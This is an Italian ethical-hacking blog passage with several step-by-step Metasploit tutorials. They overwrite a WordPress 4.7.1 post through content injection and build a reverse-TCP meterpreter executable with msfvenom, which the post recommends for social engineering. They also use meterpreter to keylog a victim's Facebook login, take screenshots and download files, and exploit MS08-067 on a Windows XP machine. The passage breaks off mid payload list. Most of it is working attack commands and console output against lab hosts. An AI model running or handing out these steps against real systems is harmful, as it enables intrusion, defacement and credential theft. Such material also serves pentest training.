Per “exploitare” questa vulnerabilità usare il modulo: auxiliary/scanner/http/wordpress_content_injection di Metasploit. Come prima cosa scoprire l’ID dell’articolo che si vuole modificare, per farlo impostare actions su LIST con il comando “set ACTION LIST“. Per più informazione dare un occhiata al link fornito da WPScan: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection

msf > use auxiliary/scanner/http/wordpress_content_injection
msf auxiliary(scanner/http/wordpress_content_injection) > show actions

Auxiliary actions:

Name    Description
----    -----------
LIST    List posts
UPDATE  Update post

msf auxiliary(scanner/http/wordpress_content_injection) > set ACTION LIST
ACTION => LIST
msf auxiliary(scanner/http/wordpress_content_injection) > set RHOSTS chit-test.ch
RHOSTS => chit-test.ch
msf auxiliary(scanner/http/wordpress_content_injection) > show options

Module options (auxiliary/scanner/http/wordpress_content_injection):

Name           Current Setting  Required  Description
----           ---------------  --------  -----------
POST_CONTENT                    no        Post content
POST_ID        0                no        Post ID (0 for all)
POST_PASSWORD                   no        Post password ('' for none)
POST_TITLE                      no        Post title
Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS         chit-test.ch     yes       The target address range or CIDR identifier
RPORT          80               yes       The target port (TCP)
SSL            false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI      /                yes       The base path to the wordpress application
THREADS        1                yes       The number of concurrent threads
VHOST                           no        HTTP server virtual host

Auxiliary action:

Name  Description
----  -----------
LIST  List posts

msf auxiliary(scanner/http/wordpress_content_injection) > run

Posts at http://10.10.10.4/ (REST API: /wp-json/wp/v2)
======================================================

ID  Title                 URL                              Password
--  -----                 ---                              --------
1   Ciao mondo!  http://chit-test.ch/ciao-mondo/  No

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/wordpress_content_injection) >

Una volta a conoscenza dell’ID dell’articolo che si vuole modificare impostare actions su UPDATE e inserire il resto delle informazioni come il contenuto dell’articolo, il titolo eccetera.
WordPress Content Injection Metasploit Module

msf auxiliary(scanner/http/wordpress_content_injection) > set ACTION UPDATE
ACTION => UPDATE
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_CONTENT "Sei stato hackerato, aggiorna WordPress!"
POST_CONTENT => Sei stato hackerato, aggiorna WordPress!
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_TITLE "Sei stato hackerato!"
POST_TITLE => Sei stato hackerato!
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_ID 1
POST_ID => 1
msf auxiliary(scanner/http/wordpress_content_injection) > show options

Module options (auxiliary/scanner/http/wordpress_content_injection):

   Name           Current Setting                           Required  Description
   ----           ---------------                           --------  -----------
   POST_CONTENT   Sei stato hackerato, aggiorna WordPress!  no        Post content
   POST_ID        1                                         no        Post ID (0 for all)
   POST_PASSWORD                                            no        Post password ('' for none)
   POST_TITLE     Sei stato hackerato!                      no        Post title
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         chit-test.ch                              yes       The target address range or CIDR identifier
   RPORT          80                                        yes       The target port (TCP)
   SSL            false                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                                         yes       The base path to the wordpress application
   THREADS        1                                         yes       The number of concurrent threads
   VHOST                                                    no        HTTP server virtual host


Auxiliary action:

   Name    Description
   ----    -----------
   UPDATE  Update post


msf auxiliary(scanner/http/wordpress_content_injection) > run

[+] SUCCESS: http://10.10.10.4/?p=1 (Post updated)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/wordpress_content_injection) > 

Una volta “exploitato” la vulnerabilità di WordPress 4.7.1 con successo dare un occhiata al sito preso di mira per vedere se ha veramente funzionato.

WordPress hackerato

└ Tags: Content Injection, DOS, ethical hacking, exploit, guida, hacking, hacking etico, italiano, linux, Penetration testing, Sicurezza, vulnerabilità, Wordpress, WordPress 4.7.1, wpscan
 Comment 

Ethical Hacking – Metasploit, Msfvenom e Meterpreter

Mag17
on 17 Maggio 2019 at 14:29
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato

Normalmente con Metasploit si “exploitano” (sfruttano) vulnerabilità delle applicazioni presenti nel sistema, con Msfvenom è possibile creare un file con un Payload – standalone – da fare eseguire alla persona presa di mira. Questo può essere molto utile in situazioni in cui si usano tattiche di social engineering.

Per ottenere informazioni su msfvenom eseguire il comando “msfvenom -h”.

Scegliere il Payload da usare con Msfvenom Metasploit

Per visualizzare un elenco di Payloads disponibili eseguire il comando msfvenom -l payloads.

msf > msfvenom -l payloads
[*] exec: msfvenom -l payloads


Framework Payloads (539 total) [--payload ]
==================================================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS

....................................................................................................

    windows/x64/vncinject/bind_tcp_uuid                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
    windows/x64/vncinject/reverse_http                  Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
    windows/x64/vncinject/reverse_https                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
    windows/x64/vncinject/reverse_tcp                   Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)
    windows/x64/vncinject/reverse_tcp_rc4               Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker
    windows/x64/vncinject/reverse_tcp_uuid              Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/vncinject/reverse_winhttp               Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)
    windows/x64/vncinject/reverse_winhttps              Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)
msf >

In questo esempio usare windows/meterpreter/reverse_tcp che genera una “reverse shell” che si connette al LHOST (l’indirizzo ip del sistema da dove si svolge l’attacco) sulla porta 888 appena il file viene eseguito.

Visualizzare le opzioni con Msfvenom Metasploit

msf > msfvenom -p windows/meterpreter/reverse_tcp --list-options
Options for payload/windows/meterpreter/reverse_tcp:
=========================


       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 283
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    sf <stephen_fewer@harmonysecurity.com>
    OJ Reeves
    hdm <x@hdm.io>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective Dll Injection 
  payload (staged). Connect back to the attacker
msf > 

Come si può vedere dall’output del comando l’informazione mancante da aggiungere è LHOST, che è l’indirizzo IP del sistema da cui si svolge l’attacco.

Scegliere il formato con Msfvenom Metasploit

Per vedere una lista dei formati disponibili usare il comando msfvenom –list formats. In questo esempio il sistema preso di mira è Windows quindi usere l’estensione di file “.exe”.

msf > msfvenom --list formats
[*] exec: msfvenom --list formats

Framework Executable Formats [--format ]
===============================================

Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war

Framework Transform Formats [--format ]
==============================================

Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript

msf >

Creare un Payload Standalone con Msfvenom di Metasploit

Una volta scelto il Payload da usare si può procedere con la creazione del file eseguibile. Usare “-f” per specificare il tipo di file.

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.3 LPORT=888 -f exe > file.exe

Il modulo Multi/handler di Metsploit

Metasploit MsfvenomA questo punto abbiamo bisogno di un handler per poter instaurare una connessione una volta che la vittima esegue il file eseguibile. Per fare ciò usare il modulo multi/handler con il comando “use multi/handler” e impostare il Payload con relative opzioni come fatto precedentemente durante la creazione del file exe con msfvenom. Una volta finito eseguire il comando exploit e fare eseguire il file alla vittima subito dopo. Si aprirà un prompt dei comandi, il meterpreter.

msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 10.10.10.3
LHOST => 10.10.10.3
msf exploit(multi/handler) > set LPORT 888
LPORT => 888
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.3:888 
[*] Sending stage (179779 bytes) to 10.10.10.6
[*] Meterpreter session 1 opened (10.10.10.3:888 -> 10.10.10.6:49157) at 2019-05-17 13:57:28 +0200

meterpreter >

Usare Meterpreter di Metasploit

Meterpreter – Help

Con il comando help si ottiene una lista dei comandi disponibili con descrizione.

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >

Meterpreter – Keyscan (Keylogger)

Keyscan è un Keylogger con cui si possono monitorare le attività della tastiera dell’obbiettivo.

meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
facebook.com
emailvittimagmail.comPassword88
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >

In questo esempio si può notare che la vittima è andata su facebook.com e subito dopo ha immesso il nome utente (l’indirizzo email) e la password.

Meterpreter – Edit (Vi)

Con il comando edit si possono editare file di testo o crearne di nuovi con l’editore di testo Vi – l’editore di testo impostato per default. Premere sul tasto insert, aggiungere del testo, uscire dalla modalità con esc e eseguire “wq!”.

meterpreter > edit hackerato.txt

Meterpreter – Pwd, cd, ls

Con meterpreter si possono usare comandi unix come pwd, cd, ls eccetera.

meterpreter > pwd
C:\Users\Chit
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Chit\Desktop
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   4096  dir   2019-05-14 17:13:48 +0200  BookApp
100666/rw-rw-rw-  282   fil   2019-05-14 16:36:40 +0200  desktop.ini
100666/rw-rw-rw-  21    fil   2019-05-17 13:02:28 +0200  hackerato.txt

Meterpreter – Screenshot

Con questo comando si possono fare degli “screenshot” del Desktop della vittima.

meterpreter > screenshot
Screenshot saved to: /root/psthIJvn.jpeg
meterpreter > 

Vittima Windows

Meterpreter – Download

Con questo comando si possono scaricare i file dal sistema preso di mira.

meterpreter > download hackerato.txt
[*] Downloading: hackerato.txt -> hackerato.txt
[*] Downloaded 21.00 B of 21.00 B (100.0%): hackerato.txt -> hackerato.txt
[*] download   : hackerato.txt -> hackerato.txt
meterpreter >
└ Tags: ethical hacking, guida, hacking, italiano, Kali Linux, Metasploit, meterpreter, Msfvenom, multi/handler
 Comment 

Ethical Hacking – Testare la sicurezza – Nmap e Metasploit

Mar04
on 4 Marzo 2019 at 15:26
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato

In questo esempio testeremo la sicurezza di un ipotetico client presente nella rete con un vecchio sistema operativo non aggiornato. L’indirizzo IP del client da testare è 10.10.10.7, il sistema operativo in uso è Windows XP PRO SP3 e non è aggiornato. Ho scelto di proposito un sistema vecchio e non aggiornato per rendere più facile la preparazione dell’esercizio ed essere sicuro di trovare gravi vulnerabilità da “exploitare”, il procedimento è comunque uguale con i sistemi più moderni.

Scansione vulnerabilità con Nmap

workstation:/home/chit # nmap --script vuln 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 01:12 CET
Nmap scan report for 10.10.10.7
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds
workstation:/home/chit #

Per rilevare il sistema operativo in uso usare l’opzione -O di Nmap.

workstation:/home/chit # nmap -O 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 19:16 CET
Nmap scan report for 10.10.10.7
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.83 seconds
workstation:/home/chit #

Come si può vedere dai risultati della scansione, Nmap ha rilevato due gravi vulnerabilità nel sistema testato e scoperto il sistema operativo in uso (Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2). In questo esempio ho creato una macchina virtuale e so che il target in questione è Microsoft Windows XP SP3 Italian. La vulnerabilità che andremo a vedere nel dettaglio e ad “exploitare”, è “MS08-067”. Si tratta di una vulnerabilità che permette di eseguire comandi da remoto sul sistema preso di mira.

Exploitare vulnerabilità in modo automatico con Metasploit

Ora che abbiamo rilevato e scelto la vulnerabilità da “exploitare” passiamo a Metasploit. Con Metasploit è possibile “exploitare” applicazioni in modo automatico senza bisogno di andare a cercare gli exploits nelle banche dati online.

Metasploit – Search module

Una volta avviato Metasploit cercare l’exploit con il seguente comando: “search MS08-67”. Metasploit mostrerà i moduli trovati.

msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > 

Kali Linux Metasploit

Metasploit – Use

Per usare un modulo eseguire “use” seguito dal modulo come segue:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Show and set target

Per vedere la lista dei targets per l’exploit eseguire il comando show targets.

msf exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)


msf exploit(windows/smb/ms08_067_netapi) > 

Chiaramente non c’è bisogno di scegliere il target – nella maggior parte dei casi -, Metasploit rileva automaticamente il sistema operativo in uso. Lasciare quindi su 0, automatico.

Se per caso si dovesse avere il bisogno di impostare manualmente il target, usare il seguente comando:

msf exploit(windows/smb/ms08_067_netapi) > set target 45
target => 45
msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    		     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Show options

Ora, il resto dei dati da inserire per potere eseguire l’exploit con successo vengono mostrati con il comando “show options“.

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit module option RHOST

Rhost, che sta per remote host, è l’host da attaccare/testare, in questo esempio l’indirizzo IP 10.10.10.7.

Metasploit module option RPORT

Rport (Remote Port) viene aggiunto automaticamente da metasploit perché la porta 445 è quella standard dell’applicazione da “exploitare”. Lasciare com’è nella maggior parte dei casi.

Metasploit module option SMBPIPE

Come nel caso della porta (RPORT) lasciare le impostazioni di default, BROWSER.

Metasploit – Set RHOST

msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.7
rhost => 10.10.10.7
msf exploit(windows/smb/ms08_067_netapi) >

Ogni volta che si cambia qualcosa si può controllare con il comando “show options” se la modifica è stata apportata con successo.

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Check

Una volta inseriti i dati necessari per la corretta esecuzione dell’exploit, si può controllare se l’host è vulnerabile a un attacco con il comando check.

msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.7:445 The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Payloads

Non abbiamo ancora finito, ora dobbiamo dire a Metasploit cosa fare una volta che il target è stato “exploitato“. Basta scegliere un Payload compatibile da eseguire dopo avere eseguito l’exploit con successo.

Metasploit – Show payloads

Per vedere un elenco di Payloads compatibili disponibili per questo modulo eseguire il comando “show payloads“.

msf exploit(windows/smb/ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload
   generic/debug_trap                                                   normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                   normal  Generic x86 Tight Loop
   windows/adduser                                                      normal  Windows Execute net user /ADD
   windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
   windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/dllinject/bind_named_pipe                                    normal  Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
   windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
   windows/dllinject/reverse_udp                                        normal  Reflective DLL Injection, Reverse UDP Stager with UUID Support
   windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
   windows/exec                                                         normal  Windows Execute Command
   windows/format_all_drives                                            manual  Windows Drive Formatter
   windows/loadlibrary                                                  normal  Windows LoadLibrary Path
   windows/messagebox                                                   normal  Windows MessageBox
